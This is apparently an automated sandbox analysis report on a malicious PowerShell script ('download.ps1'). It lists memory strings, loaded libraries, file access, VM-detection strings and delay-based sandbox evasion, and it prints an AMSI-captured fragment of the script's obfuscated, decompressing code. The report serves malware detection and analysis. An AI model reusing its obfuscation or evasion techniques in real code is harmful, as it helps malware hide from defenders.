Source: powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: var e=this||self;var g,h;a:{for(var k=["CLOSURE_FLAGS"],l=e,n=0;n<k.length;n++)if(l=l[k[n]],l==null){h=null;break a}h=l}var p=h&&h[610401301];g=p!=null?p:!1;var q,r=e.navigator;q=r?r.userAgentData||null:nulldocument,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE77E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
Source: powershell.exe, 00000000.00000002.2172963957.00000225BC949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2172963957.00000225BC9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141075548.00000225AE032000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2Qfn9Uonm_X_4tTv321io--o9kFCHBz" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2141075548.00000225AE09E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: cument,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="ZyRLHfeFz8ZbNWiHfvCzJw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: classification engine | Classification label: mal64.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqpvwrn5.ibt.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $049h8rxnvqfbt27.(([system.String]::new(@((235505/(16643525/4735)),(238317/(5977248/2784)),(-9346+(1827+(7527+(-5188+5292)))),(-4857+(-770+(3789+(-4097+(11413-(734+(9380-(5285027/1111)))))))),(6501-(15043-(537+8089))),(-3722+3833)))))( $sgvhtey7i8axq3r ) $049h8rxnvqfbt27.(([system.String]::new(@((279926/4178),(56484/(2982-(2132+(-7110+(10569-(-4136+(1930+(-733+(10266061/(12158290/(3350540/(4170234/8949)))))))))))),(2320-(717925/325)),(9204-9089),(-9836+9937)))))()$0lu51qr8owa9zh37ywckn3xdhbuie.(([system.String]::new(@((6297-6230),(-8043+8151),(353646/(12145032/(11016-(10521-3317)))),(-212+327),(970610/(17833-8223))))))()[byte[]] $ioj8fg7y3huk5a6 = $sgvhtey7i8axq3r.(([system.String]::new(@((-8712+(9714-918)),(629481/5671),(-6254+6319),(4095-3981),(1024860/(-1084+10074)),(10114-10017),(847847/7007)))))() $uykm374xtfghd2z=$ioj8fg7y3huk5a6 return $uykm374xtfghd2z}[System.Text.Encoding]::ascii.((-join (@((216337/(4948328/1624)),(683265/(-976+(7321+420))),(4552-4436),(-855+(4385150/4675)),(760148/6553),(-6942+(373+6683)),(8509-8404),(766590/6969),(6417-(64364916/10194)))| ForEach-Object { [char]$_ })))((nvgh3e65mupyqljs8obki24acw1 "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbu source: powershell.exe, 00000000.00000002.2186794681.00000225C4C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2140421912.00000225AA652000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2140421912.00000225AA652000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbS source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2183490540.00000225C4824000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2184943759.00000225C4BD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2184943759.00000225C4B17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb: source: powershell.exe, 00000000.00000002.2187129153.00000225C4CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP source: powershell.exe, 00000000.00000002.2186794681.00000225C4C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF848E1D2A5 pushad ; iretd 0_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF848F4A178 push E95C7C03h; ret 0_2_00007FF848F4A199
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF848F34FAB push ecx; ret 0_2_00007FF848F34FAC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF84900CFE4 pushfd ; iretd 0_2_00007FF84900CFE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF8491F340F pushfd ; iretd 0_2_00007FF8491F3411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF8491F3D18 push es; ret 0_2_00007FF8491F3D19

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5813
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware`SH
Source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine-StampMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2141075548.00000225AD308000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.2187129153.00000225C4C88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
